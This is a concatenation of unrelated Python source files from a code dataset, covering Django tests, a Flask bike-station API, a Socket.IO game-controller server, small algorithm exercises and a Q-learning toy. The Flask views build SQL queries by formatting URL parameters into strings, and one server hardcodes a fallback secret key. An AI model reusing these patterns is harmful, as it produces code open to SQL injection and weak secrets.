external_id.res_id,\n 'obj_id': sync_obj.id,\n 'name': '1900-01-01 00:00:00',\n })\n\n @api.model\n def _init_l10n_se_hr_payroll_separate(self):\n \"\"\"Disable workflow init on hr.holidays. Otherwise the workflow will corrupt synced data (the state field, and maybe more).\"\"\"\n self.env.ref('hr_holidays.wkf_holidays').on_create = False\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","sub_path":"l10n_se_hr_payroll_separate/hr_payslip_run.py","file_name":"hr_payslip_run.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"99084219","text":"from django.core.urlresolvers import reverse\nfrom django.test import TestCase\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django_hello_world.hello.models import Person, Request\n\n\nclass HelloTest(TestCase):\n def test_home_view(self):\n response = self.client.get(reverse('home'))\n self.assertEqual(response.status_code, 200)\n\n labels = (\n '42 Coffee Cups',\n 'Name:',\n 'Last name:',\n 'Date of birth:',\n 'Bio:',\n 'Contacts:',\n 'Email:',\n 'Jabber:',\n 'Skype:',\n 'Other contacts:',\n )\n for label in labels:\n self.assertContains(response, label)\n\n person = Person.objects.get(pk=1)\n self.assertContains(response, person.name)\n self.assertContains(response, person.last_name)\n self.assertContains(response,\n person.date_of_birth.strftime(\"%d-%m-%Y\"))\n self.assertContains(response, person.bio)\n self.assertContains(response, person.email)\n self.assertContains(response, person.jabber)\n self.assertContains(response, person.skype)\n self.assertContains(response, person.other_contacts)\n\n def test_model_person(self):\n self.assertEqual(Person.objects.count(), 1)\n\n def test_home_view_requests(self):\n response = self.client.get(reverse('home'))\n self.assertContains(response, 'requests')\n\n def test_req_view(self):\n response = self.client.get(reverse('requests'))\n self.assertEqual(response.status_code, 200)\n\n def test_request_middleware(self):\n test_url = '/test/request/'\n try:\n self.client.get(test_url)\n except:\n pass\n\n last_id = Request.objects.count()\n last_req = Request.objects.get(pk=last_id)\n self.assertEqual(last_req.path, test_url)\n\n def test_context_processor_settings(self):\n response = self.client.get(reverse('home'))\n self.assertEqual(response.context['settings'].TIME_ZONE,\n settings.TIME_ZONE)\n self.assertEqual(response.context['settings'].ROOT_URLCONF,\n settings.ROOT_URLCONF)\n\n def test_login_page(self):\n response = self.client.get(reverse('login'))\n self.assertEqual(response.status_code, 200)\n\n def test_edit_page(self):\n # Anonymous access\n response = self.client.get(reverse('edit'))\n self.assertEqual(response.status_code, 302) # 302 - Redirection\n\n # Create test user and login\n User.objects.create_user('testuser',\n 'test@test.com',\n 'testpassword')\n self.client.login(username='testuser',\n password='testpassword')\n response = self.client.get(reverse('edit'))\n self.assertEqual(response.status_code, 200)\n\n # Post new data\n new_data = {'name': 'John',\n 'last_name': 'Pupkin',\n 'date_of_birth': '1991-07-08',\n 'bio': 'Top Secret',\n 'email': 'aaa@bbb.ccc',\n 'jabber': 'xxx@yyy.zzz',\n 'skype': 'pupkin',\n 'other_contacts': '',}\n response = self.client.post(reverse('edit'), new_data)\n self.assertEqual(response.status_code, 302) # 302 - Redirection\n\n person = Person.objects.get(pk=1)\n self.assertEqual(person.name, new_data['name'])\n self.assertEqual(person.last_name, new_data['last_name'])\n self.assertEqual(person.date_of_birth.strftime(\"%Y-%m-%d\"),\n new_data['date_of_birth'])\n self.assertEqual(person.bio, new_data['bio'])\n self.assertEqual(person.email, new_data['email'])\n self.assertEqual(person.jabber, new_data['jabber'])\n self.assertEqual(person.skype, new_data['skype'])\n self.assertEqual(person.other_contacts,\n new_data['other_contacts'])\n\n","sub_path":"django_hello_world/hello/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"534829558","text":"from django.contrib import admin\n\nfrom .models import ContactoEmpresa, Empresa\n\nclass EmpresaAdmin(admin.ModelAdmin):\n\tlist_display = ('id', 'empresa', 'usuario')\n\tlist_filter = ('usuario', )\n\tsearch_fields = ('empresa',)\n\n\n\nadmin.site.register(ContactoEmpresa)\nadmin.site.register(Empresa, EmpresaAdmin)","sub_path":"empresas/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"649669858","text":"\"\"\"\nConnected Components\n--------------------\nParts of the graph that are connected, but disjoint from other parts of the\ngraph.\n\nTo count connected componets:\n For each node:\n if node not visited:\n traverse from that node\n increment counter\n\n\"\"\"\n\n\n\ndef get_neighbors(row, col, matrix):\n neighbors = []\n \n if row > 0 and matrix[row - 1][col] == 1:\n neighbors.append((row - 1, col))\n if row < len(matrix) - 1 and matrix[row + 1][col] == 1:\n neighbors.append((row + 1, col))\n if col > 0 and matrix[row][col - 1] == 1:\n neighbors.append((row, col - 1))\n if col < len(matrix[0]) - 1 and matrix[row][col + 1] == 1:\n neighbors.append((row, col + 1))\n\n return neighbors\n\ndef dft(row, col, matrix, visited):\n s = []\n s.append((row, col))\n\n while len(s) > 0:\n row, col = s.pop()\n\n if visited[row][col] == False:\n visited[row][col] = True\n\n for neighbor in get_neighbors(row, col, matrix):\n s.append(neighbor)\n\n\nmatrix = [[0, 1, 0, 1, 0],\n [1, 1, 0, 1, 1],\n [0, 0, 1, 0, 0],\n [0, 0, 1, 0, 0],\n [1, 1, 0, 0, 0]]\n\nisland_count = 0\n\nvisited = []\n\nfor _ in range(len(matrix)):\n visited.append([False] * len(matrix[0]))\n\nfor row in range(len(matrix)):\n for col in range(len(matrix[row])):\n if visited[row][col] == False:\n if matrix[row][col] == 1:\n dft(row, col, matrix, visited)\n\n island_count += 1\n\nprint(island_count)\n\nimport random\n\nclass Graph:\n\n def populate_graph(self, num_users, avg_friendships):\n # Reset graph\n self.last_id = 0\n self.users = {}\n self.friendships = {}\n\n # Add users\n for i in range(0, num_users):\n self.add_user(f\"User {i}\")\n\n # Create Frienships\n # Generate all possible friendship combinations\n possible_friendships = []\n\n # Avoid duplicates by ensuring the first number is smaller than the second\n for user_id in self.users:\n for friend_id in range(user_id + 1, self.last_id + 1):\n possible_friendships.append((user_id, friend_id))\n\n # Shuffle the possible friendships\n random.shuffle(possible_friendships)\n\n # Create friendships for the first X pairs of the list\n # X is determined by the formula: num_users * avg_friendships // 2\n # Need to divide by 2 since each add_friendship() creates 2 friendships\n for i in range(num_users * avg_friendships // 2):\n friendship = possible_friendships[i]\n self.add_friendship(friendship[0], friendship[1])\n\n def add_user(self, user_name):\n pass\n\n def add_friendship(self, user_name):\n pass","sub_path":"class/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"526875190","text":"from subprocess import call\n\nimport traceback\nimport logging\n\nclass IRSend():\n @staticmethod\n def withRemote(remoteName):\n return IRSend(remoteName)\n \n def __init__(self, remoteName):\n self.remoteName = remoteName\n\n def once(self, buttonName):\n try:\n logging.info(\"Sending %s with remote %d once.\", buttonName, self.remoteName)\n call([\"irsend\", \"SEND_ONCE\", self.remoteName, buttonName])\n except Exception as e:\n logging.error(\"An error occured.\")\n logging.error(traceback.format_exc())\n","sub_path":"devices/actions/irsend.py","file_name":"irsend.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"427352885","text":"import os\nimport urllib\nfrom datetime import datetime, timedelta\nfrom flask import Flask, render_template, jsonify\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport numpy as np\nfrom flask_cache import Cache\n\ndef get_db():\n db_path = os.path.dirname(__file__) + \"/db/\"\n db_name = \"dublin_bikes.db\"\n if not os.path.isfile(db_path + db_name):\n print(\"dublin_bikes.db not found, retrieving from backup...\")\n db_url = \"https://s3-eu-west-1.amazonaws.com/bmxbandits/dublin_bikes.db\"\n urllib.request.urlretrieve(db_url, db_path + db_name)\n return create_engine(\"sqlite:///\" + db_path + db_name)\n\napp = Flask(__name__)\n\n# Development\nif __name__ == '__main__':\n cache_config = {\n 'CACHE_TYPE' : 'simple'\n }\nelse:\n # Production\n cache_config = {\n 'CACHE_TYPE' : 'redis',\n 'CACHE_KEY_PREFIX' : 'bmxcache',\n 'CACHE_REDIS_HOST' : 'bmxbanditsredis.goe8i6.0001.euw2.cache.amazonaws.com',\n 'CACHE_REDIS_PORT': '6379',\n 'CACHE_REDIS_URL': 'redis://bmxbanditsredis.goe8i6.0001.euw2.cache.amazonaws.com:6379'\n }\n\napp.cache = Cache(app, config=cache_config)\nengine = get_db()\n@app.route('/')\ndef show_json():\n return render_template('index.html', lat=53.345937, lng=-6.2626352, zoom=14)\n\n# Markers\n@app.route(\"/stat\")\n@app.cache.cached()\ndef get_all_static():\n sql = \"select * from static;\"\n rows = engine.execute(sql).fetchall()\n return jsonify(stations=[dict(row.items()) for row in rows])\n\n# Markers Availability\n@app.route(\"/dyn\")\n@app.cache.cached(timeout=300)\ndef get_all_dynamic():\n sql = \"SELECT * FROM ( SELECT number, \" \\\n \"MAX(last_update) AS max_update FROM dynamic GROUP BY number) AS n \"\\\n \"INNER JOIN dynamic AS d \" \\\n \"ON d.number = n.number \" \\\n \"AND d.last_update = n.max_update;\"\n rows = engine.execute(sql).fetchall()\n return jsonify(stations=[dict(row.items()) for row in rows])\n\n# Marker Static Info\n@app.route(\"/stat/\")\ndef get_one_static(number):\n sql = \"select * from static where number = {};\".format(number)\n rows = engine.execute(sql).fetchall()\n return jsonify(stations=[dict(row.items()) for row in rows])\n\n# Marker Dynamic Info\n@app.route(\"/dyn/\")\n@app.cache.memoize(timeout=300)\ndef get_one_dynamic(stn_no):\n sql = \"SELECT d1.* FROM dynamic d1 \"\\\n \"INNER JOIN (\"\\\n \"SELECT number, MAX(last_update) max_update \"\\\n \"FROM dynamic \"\\\n \"WHERE number = {} ) d2 \"\\\n \"ON d1.last_update = d2.max_update \" \\\n \"AND d1.number = d2.number;\".format(stn_no)\n rows = engine.execute(sql).fetchall()\n return jsonify(stations=[dict(row.items()) for row in rows])\n\n@app.cache.memoize(timeout=1800)\ndef get_dataframe_base(number=None):\n dt = datetime.today()\n ts = int((dt - (timedelta(days=21))).timestamp() * 1000)\n query = \"select number, available_bike_stands,available_bikes, last_update from dynamic where last_update > {}\".format(ts)\n if number is not None:\n query += \" and number = {}\".format(number)\n df = pd.read_sql_query(query, engine)\n df['last_update_date'] = pd.to_datetime(df.last_update, unit=\"ms\")\n df.set_index('last_update_date', inplace=True)\n df.drop('last_update', axis=1, inplace=True)\n return df\n\n# Closest Stations\n@app.route(\"/distance///\")\n@app.cache.memoize(timeout=1800)\ndef get_distance(origin, day, hour):\n # Wraparound at midnight/end of week\n hour += 1\n if hour == 24:\n day += 1\n if day == 7:\n day = 0\n hour = 0\n\n sql_dist = \"select dest, dist from distance where origin = {};\".format(origin)\n rows_dist = engine.execute(sql_dist).fetchall()\n df = get_dataframe_base()\n df = df.loc[(df.index.weekday == day) & (df.index.hour == hour), ['number', 'available_bike_stands', 'available_bikes']]\n weekday_count = df.groupby(['number']).agg(np.mean)\n avail_dict = weekday_count.to_dict(orient=\"index\")\n for row in rows_dist:\n avail_dict[row[0]][\"distance\"] = row[1]\n avail_dict.pop(origin)\n return jsonify(distance=[(int(key), value) for key, value in avail_dict.items()])\n\n\n# Availability Chart\n@app.route(\"/weekday//\")\n@app.cache.memoize(timeout=1800)\ndef get_station_stats_by_day(number, weekday):\n df = get_dataframe_base(number)\n df = df.loc[df.index.weekday == weekday, ['available_bike_stands', 'available_bikes']]\n df['group'] = df.index.hour\n weekday_count = df.groupby(['group']).agg(np.mean)\n return weekday_count.round().to_json(orient=\"records\")\n\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"dublin_flask/bikes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"285565074","text":"import sys\nimport time\n\ntry:\n from IPython.core.display import clear_output\n have_ipython = True\nexcept ImportError:\n have_ipython = False\n\n\nclass Waitbar(object):\n \n def __init__(self, use_eta=False,totalWidth=77):\n self.progBar = \"[]\" # This holds the progress bar string\n self.min = 0.0\n self.max = 1.0\n self.span = self.max-self.min\n self.width = totalWidth\n \n self.display_eta=True\n \n self.amount = 0 # When amount == max, we are 100% done \n self.update(0) # Build progress bar string\n\n self.initial_time=time.time()\n\n if have_ipython:\n self.display = self.display_ipython\n else:\n self.display = self.display_noipython\n \n \n def update(self, newAmount = 0):\n if newAmount < self.min: newAmount = self.min\n if newAmount > self.max: newAmount = self.max\n self.amount = newAmount\n\n # Figure out the new percent done, round to an integer\n diffFromMin = float(self.amount - self.min)\n percentDone = (diffFromMin / float(self.span)) * 100.0\n \n if self.display_eta:\n if percentDone==0.0:\n eta_str=' (ETA: ??)'\n else:\n dt=time.time()-self.initial_time\n \n eta=dt/percentDone*(100-percentDone)\n \n seconds=eta%60\n eta=int(eta/60)\n minutes=eta%60\n eta=int(eta/60)\n hours=eta%24\n eta=int(eta/24)\n days=eta\n \n eta_str=' (ETA: '\n if days:\n eta_str+=str(days)+\" d \"\n if hours:\n eta_str+=str(hours)+\" h \"\n if minutes:\n eta_str+=str(minutes)+\" m \"\n eta_str+='%.1f s)' % seconds\n \n \n else:\n eta_str=''\n \n percentDone = round(percentDone)\n percentDone = int(percentDone)\n\n done_str=str(percentDone)+\"%\" +eta_str\n \n \n \n \n # Figure out how many hash bars the percentage should be\n allFull = self.width - 2\n numHashes = (percentDone / 100.0) * allFull\n numHashes = int(round(numHashes))\n\n # build a progress bar with hashes and spaces\n self.progBar = \"[\" + '#'*numHashes + ' '*(allFull-numHashes) + \"]\"\n\n # figure out where to put the percentage, roughly centered\n percentPlace = (len(self.progBar) // 2) - len(done_str)//2 \n percentString = done_str\n\n # slice the percentage into the bar\n self.progBar = self.progBar[0:percentPlace] + percentString + self.progBar[percentPlace+len(percentString):]\n\n \n def display_ipython(self):\n try:\n clear_output()\n except Exception:\n # terminal IPython has no clear_output\n pass\n\n print( '\\r',self,end=\"\")\n sys.stdout.flush()\n time.sleep(0.001)\n\n def display_noipython(self):\n print( '\\r',self,end=\"\")\n sys.stdout.flush()\n \n def updated(self,newAmount=0):\n self.update(newAmount)\n self.display()\n \n \n def __str__(self):\n return str(self.progBar)\n\n\nif __name__==\"__main__\":\n import time\n w = Waitbar(False)\n for i in xrange(1000):\n w.update(i/1000.0)\n print(w,end=\"\")\n time.sleep(.01)\n \n","sub_path":"plasticnet/Waitbar.py","file_name":"Waitbar.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"269421767","text":"#python3\n\nclass TreeNode:\n def __init__(self,x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def __init__(self):\n self.sum = 0\n def sumOfLeftLeaves(self,root) -> int:\n if root == None:\n return 0\n if (root.left != None and root.left.left == None and root.left.right == None):\n self.sum += root.left.val\n self.sumOfLeftLeaves(root.left)\n self.sumOfLeftLeaves(root.right)\n return self.sum\n\nif __name__ == \"__main__\":\n s = Solution()\n t1 = TreeNode(1)\n t2 = TreeNode(2)\n t3 = TreeNode(3)\n t1.right = t2\n t1.left = t3\n print(s.sumOfLeftLeaves(t1))","sub_path":"leetcode/SumOfLeftLeaves.py","file_name":"SumOfLeftLeaves.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"553926687","text":"import argparse\nimport asyncio\nimport logging\nimport os\nfrom typing import Optional\n\nfrom flask import Flask\nfrom flask_socketio import SocketIO\nfrom flask_socketio import send\n\nfrom switchremoteplay.controller import SwitchController\n\n# Follow the example at https://flask-socketio.readthedocs.io/en/latest/\n\nlogger = logging.getLogger('switchremoteplay')\n\napp = Flask(__name__, static_folder='../../switch-rp-client/build', static_url_path='/')\napp.config['SECRET_KEY'] = os.getenv('SECRET_KEY') or 'asdasdasdf'\nsocketio = SocketIO(app, cors_allowed_origins='*')\n\ncontroller: Optional[SwitchController] = None\n\n@app.route('/')\ndef my_index():\n return app.send_static_file('index.html')\n\n@socketio.on('connect')\ndef test_connect():\n\tprint(\"Connected\")\n\tsend({'connected': True}, json=True)\n\n\n@socketio.on('disconnect')\ndef test_disconnect():\n\tprint(\"Disconnected\")\n\n\n# Handle unnamed events.\n@socketio.on('message')\ndef handle_message(message):\n\tprint(\"received message: \" + message)\n\n\n# Handle unnamed events with JSON.\n@socketio.on('json')\ndef handle_json(json):\n\tprint(\"received json: \" + str(json))\n\n\n@socketio.on('p')\ndef handle_press(command):\n\tlogger.debug(\"Got command: `%s`\", command)\n\tcontroller.run(command)\n\treturn \"DONE `{}`\".format(command)\n\n\nasync def _main():\n\tlogger.info(\"Starting\")\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-r', '--switch_mac_address', type=str, default=None,\n\t\t\t\t\t\thelp=\"The Switch console's MAC address. Specify this if you've already paired a Switch console to your server device.\")\n\n\targs = parser.parse_args()\n\tswitch_mac_address = args.switch_mac_address\n\n\tglobal controller\n\ttry:\n\t\tcontroller = await SwitchController.get_controller(logger, switch_mac_address)\n\t\tstart_server()\n\t\t# Keep the server running.\n\t\t# There must be a better way to do this but this seems to work fine for now.\n\t\twhile True:\n\t\t\tawait asyncio.sleep(60)\n\tfinally:\n\t\tlogger.info('Stopping the service...')\n\n\ndef start_server():\n\thost = '0.0.0.0'\n\t# 5000 is the default port.\n\tport = 5000\n\t# port = 48668\n\tprint(\"Running at {}:{}\".format(host, port))\n\n\tl = asyncio.get_running_loop()\n\n\tdef _start():\n\t\tasyncio.set_event_loop(l)\n\t\tsocketio.run(app, host, port)\n\n\tl.run_in_executor(None, _start)\n\n\nif __name__ == '__main__':\n\tlogger.setLevel(logging.INFO)\n\tloop = asyncio.get_event_loop()\n\tloop.run_until_complete(\n\t\t_main()\n\t)\n\tprint(\"done\")\n","sub_path":"server/switchremoteplay/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"414403898","text":"times=int(input())\nfor i in range(times):\n n=int(input())\n line1=input().split()\n line1=[int(x) for x in line1]\n answer=0\n for i in range(n-1):\n for j in range(i+1,n):\n if line1[i]==line1[j]:\n answer+=1\n print(answer)","sub_path":"Code/CodeRecords/2677/60677/261471.py","file_name":"261471.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"379311692","text":"# This is a script to take the landmark coordinates\n# from an Oak object and make a csv file with\n# x, y coordinates organized just as they are in\n# the tutorial\n\nfrom plot_points import get_scale\nfrom numpy.lib.function_base import append\nimport pandas as pd\nimport oaks\nimport random\n\n\ndef main():\n\n # making the dictionary that holds the oak objects\n num_images = 230\n oak_dict = {}\n for i in range(num_images):\n currentOak = oaks.makeOaks(i)\n oak_dict[i] = currentOak\n\n # Now, have to extract coordinates and place\n # x and y in separate columns, then put into dataframe\n data_list = []\n \"\"\"\n # test the shuffling of the veins\n currOak = oaks.makeOaks(0)\n veins = currOak.minor_secondary\n\n v_list = list(veins.items())\n #print(\"List not shuffled:\", v_list)\n random.shuffle(v_list)\n #print(\"Shuffled list:\", v_list)\n v_shuf = dict(v_list)\n # print(v_shuf)\n \"\"\"\n\n landmark_list = ['blade_tip', 'petiole_blade', 'petiole_tip']\n for i in oak_dict:\n # create empty list\n points_list = []\n # instatiate variable with current Oak object\n myOak = oak_dict[i]\n # retrieve image name of current Oak\n name = myOak.file_name\n # add image name to the points list\n points_list.append(name)\n # add all points to points list of specified landmark\n for j in landmark_list:\n points_list = extract_point(\n myOak, j, points_list, to_scale=True)\n\n # contain the points for all of the Oak images\n\n data_list.append(points_list)\n\n # make the columns for the dataframe, length\n # depends on how many, and which, landmarks are\n # being used\n col_list = ['']\n for i in range(6):\n col_list.append(i)\n\n # make list of columns that need to be dropped\n # for each image to have the same number of keypoints\n # only necessary if doing lobe tips, sinuses, or veins\n cols_to_drop = []\n for j in range(9, 39):\n cols_to_drop.append(j)\n\n df = pd.DataFrame(data_list, columns=col_list)\n # print(df)\n df.to_csv(\n 'three_points_training_not_shuffled.csv', index=False)\n\n random.shuffle(data_list)\n all_df = pd.DataFrame(data_list, columns=col_list)\n # rint(all_df)\n all_df.to_csv(\n 'three_points_training_shuffled.csv', index=False)\n\n min_df = pd.DataFrame(data_list, columns=col_list)\n #min_df.drop(min_df.columns[cols_to_drop], axis=1, inplace=True)\n # min_df.to_csv(\n # 'sinus_training_min_points_shuffled.csv', index=False)\n\n\ndef extract_point(oak, landmark, points, to_scale):\n point_list = points\n # get the landmark attribute that we are looking for\n lm = getattr(oak, landmark)\n # turn dict items into list\n lm_list = list(lm.items())\n # shuffle list items\n random.shuffle(lm_list)\n # convert back to dict\n landmark_dict = dict(lm_list)\n if to_scale:\n scale = get_scale(oak)\n for i in landmark_dict:\n point_list.append(int(landmark_dict[i][0] / scale))\n point_list.append(int(landmark_dict[i][1] / scale))\n else:\n for j in landmark_dict:\n point_list.append(landmark_dict[j][0])\n point_list.append(landmark_dict[j][1])\n return point_list\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/make_table_keypoint.py","file_name":"make_table_keypoint.py","file_ext":"py","file_size_in_byte":3329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"417481400","text":"#!/usr/bin/env python3\r\n\r\n'''\r\nCreated on 18.03.2013\r\n\r\n@author: soeren\r\n'''\r\n\r\nimport sys\r\nimport pickle\r\n# from importlib import import_module\r\nfrom socketserver import BaseRequestHandler, ThreadingMixIn, UDPServer\r\n\r\nfrom PyQt4.QtCore import QCoreApplication\r\n\r\n# from core.card import CardDeck, Card\r\nfrom core.game_host import NetworkGameHost\r\nfrom core.net.udp_service import UdpService\r\n\r\n\r\nclass PyDurakUdpServerHandler(BaseRequestHandler):\r\n \r\n game_host = None\r\n\r\n \r\n def handle(self):\r\n data = self.request[0].strip()\r\n socket = self.request[1]\r\n print (\"[{0}] broadcast request: {1}\".format(self.client_address[0], data.decode()))\r\n game_list = {\"Spiel A\":55561, \"Spiel B\":55562}\r\n socket.sendto(pickle.dumps(game_list), self.client_address)\r\n\r\n\r\n\r\nclass PyDurakServer(object):\r\n '''\r\n The PyDurakServer manages a game host and a udp module to get server/game information.\r\n '''\r\n \r\n def __init__(self):\r\n print(\"\\n=======================\\n=== PyDurak Server\\n=======================\")\r\n \r\n def startUI(self):\r\n print(\"UI mode not implemented yet!\")\r\n #mainWindow = import_module(\"server.ui.server_window\").ServerWindow()\r\n #mainWindow.show()\r\n self.__run()\r\n \r\n def startConsole(self):\r\n self.__server_app = QCoreApplication(sys.argv)\r\n self.__game_host = NetworkGameHost()\r\n self.__run()\r\n \r\n def setup_udp_service(self):\r\n self.__identification_service = UdpService()\r\n \r\n handler = PyDurakUdpServerHandler\r\n handler.game_host = self.__game_host\r\n self.__identification_service.publish(55560, handler)\r\n \r\n print(\"UDP Service published on port 55560\")\r\n\r\n def __run(self):\r\n self.setup_udp_service()\r\n sys.exit(self.__server_app.exec_())\r\n \r\n def quit(self):\r\n self.__server_app.quit()\r\n ","sub_path":"pydurak/server/pydurak_server.py","file_name":"pydurak_server.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"580443041","text":"import numpy as np\nimport pandas as pd\nimport time\n\n#生成随机数\nnp.random.seed(2)\n\n#设置全局变量,固定的属性\nN_STATES=6 #起点到终点的距离\nACTIONS=['left','rigth'] #机器允许的动作,左右\nEPSILON=0.9 #greedy police一个参数\nALPHA=0.1 #学习效率\nLAMBDA=0.9 #未来奖励的衰减值\nMAX_EPISODES=13 #最大的训练回合\nFRESH_TIME=0.3 #每走一步所花费的时间\n\n#初始化建立Q-table\ndef build_q_table(n_states,actions):\n #创建一张起点到终点距离的长度一样的表格,列为机器允许的动作\n table=pd.DataFrame(np.zeros((n_states,len(actions))),columns=actions)\n return table\n\n# build_q_table(N_STATES,ACTIONS)\n\n#初始化机器的动作功能\n#根据当前的状态和q_table的值来选择下一步的动作\ndef choose_action(state,q_table):\n #选取q_table的第几行\n state_actions=q_table.iloc[state,:]\n #当生成的随机数的值大于0.9时候,或者q_table一整行全为0的时候随机选取left或者right\n if (np.random.uniform()>EPSILON) or (state_actions.all()==0):\n action_name=np.random.choice(ACTIONS)\n else:\n #当不满足上述条件的时候,将q_table的较大的那个数字选择出来\n action_name=state_actions.argmax()\n return action_name\n\n#初始化反馈\ndef get_env_feedback(S,A):\n if A=='right':\n if S==N_STATES-2:\n S_='terminal'\n R=1\n else:\n S_=S+1\n R=0\n else:\n R=0\n if S==0:\n S_=S\n else:\n S_=S-1\n return S_,R\n\n#初始化环境\ndef update_env(S,episode,step_counter):\n env_list=['-']*(N_STATES-1)+['T']\n if S=='terminal':\n interaction='Episode %s: total_steps=%s'%(episode+1,step_counter)\n print('\\r{}'.format(interaction),end='')\n time.sleep(2)\n print('\\r ',end=\"\")\n else:\n env_list[S]='o'\n interaction=''.join(env_list)\n print('\\r{}'.format(interaction),end=\"\")\n time.sleep(FRESH_TIME)\n\n#创建主循环\ndef rl():\n q_table=build_q_table(N_STATES,ACTIONS)\n for episode in range(MAX_EPISODES):\n step_counter=0\n S=0\n is_terminated=False\n update_env(S,episode,step_counter)\n while not is_terminated:\n A=choose_action(S,q_table)\n S_,R=get_env_feedback(S,A)\n q_predict=q_table.loc[S,A]\n if S_!='terminal':\n q_target=R+LAMBDA*q_table.iloc[S_,:].max()\n else:\n q_target=R\n is_terminated=True\n q_table.loc[S,A]=q_table.loc[S,A]+ALPHA*(q_target-q_predict)\n S=S_\n update_env(S,episode,step_counter+1)\n step_counter=step_counter+1\n return q_table\n\nif __name__ == \"__main__\":\n q_table=rl()\n print('r\\n\\Q-table:\\n')\n print(q_table)\n","sub_path":"jupyter项目/强化学习/Q_Learning.py","file_name":"Q_Learning.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"109969782","text":"import datetime\nimport csv\n\nimport numpy as np\nimport pylab as pl\nfrom matplotlib import finance\nfrom matplotlib.collections import LineCollection\n\nfrom sklearn import cluster, covariance, manifold\n\n\nimport matplotlib.pyplot as plt\n\n\n\ndef trimMatix(matrix):\n\tlengths = []\n\tfor i in matrix:\n\t\tlengths.append(len(i))\n\tminLength = min(lengths)\n\timport pdb; pdb.set_trace()\n\ttrimmedQuotes = matrix[:][minLength]\n\treturn trimmedQuotes\n\ndef getDates():\n\td1 = datetime.datetime(2012, 1, 1)\n\td2 = datetime.datetime(2014, 1, 1)\n\treturn d1, d2\n\ndef getTickers():\n\twith open('tickers', mode='r') as infile:\n\t reader = csv.reader(infile)\n\t tickers = {rows[0]:rows[1] for rows in reader}\n\t return tickers\n\ndef getInstruments(tickers):\n\tsymbols, names = np.array(tickers.items()).T\n\treturn symbols, names\n\ndef getData(symbols, d1, d2):\n\tquotes = [finance.quotes_historical_yahoo(symbol, d1, d2, asobject=True)\n\t for symbol in symbols]\n\treturn quotes\n\ndef fitData(quotes):\n\topenPrice = np.array([q.open.astype(np.float) for q in quotes])\n\tclosePrice = np.array([q.close.astype(np.float) for q in quotes])\n\treturn openPrice, closePrice\n\n\ndef main():\n\td1, d2 = getDates()\n\ttickers = getTickers()\n\tfor ticker, name in tickers.iteritems():\n\t\tprint(ticker+', '+name)\n\n\n\tsymbols, names = getInstruments(tickers)\n\tquotes = getData(symbols, d1, d2)\n\n\topenPrice, closePrice = fitData(quotes)\n\t#trimmedQuotes = trimMatix(closePrice)\n\n\t# The daily variations of the quotes are what carry most information\n\t# variation = closePrice - openPrice\n\n\n\t###############################################################################\n\t# Learn a graphical structure from the correlations\n\tedge_model = covariance.GraphLassoCV()\n\n\t# # standardize the time series: using correlations rather than covariance\n\t# # is more efficient for structure recovery\n\tX = closePrice.copy().T\n\tX /= X.std(axis=0)\n\tedge_model.fit(X)\n\n\n\n\t\t###############################################################################\n\t# Cluster using affinity propagation\n\n\t_, labels = cluster.affinity_propagation(edge_model.covariance_)\n\tn_labels = labels.max()\n\n\tfor i in range(n_labels + 1):\n\t print('Cluster %i: %s' % ((i + 1), ', '.join(names[labels == i])))\n\n\t###############################################################################\n\t# Find a low-dimension embedding for visualization: find the best position of\n\t# the nodes (the stocks) on a 2D plane\n\n\t# We use a dense eigen_solver to achieve reproducibility (arpack is\n\t# initiated with random vectors that we don't control). In addition, we\n\t# use a large number of neighbors to capture the large-scale structure.\n\tnode_position_model = manifold.LocallyLinearEmbedding(\n\t n_components=2, eigen_solver='dense', n_neighbors=6)\n\n\tembedding = node_position_model.fit_transform(X.T).T\n\n\t###############################################################################\n\t# Visualization\n\tplt.figure(1, facecolor='w', figsize=(10, 8))\n\tplt.clf()\n\tax = plt.axes([0., 0., 1., 1.])\n\tplt.axis('off')\n\n\t# Display a graph of the partial correlations\n\tpartial_correlations = edge_model.precision_.copy()\n\td = 1 / np.sqrt(np.diag(partial_correlations))\n\tpartial_correlations *= d\n\tpartial_correlations *= d[:, np.newaxis]\n\tnon_zero = (np.abs(np.triu(partial_correlations, k=1)) > 0.02)\n\n\t# Plot the nodes using the coordinates of our embedding\n\tplt.scatter(embedding[0], embedding[1], s=100 * d ** 2, c=labels,\n\t 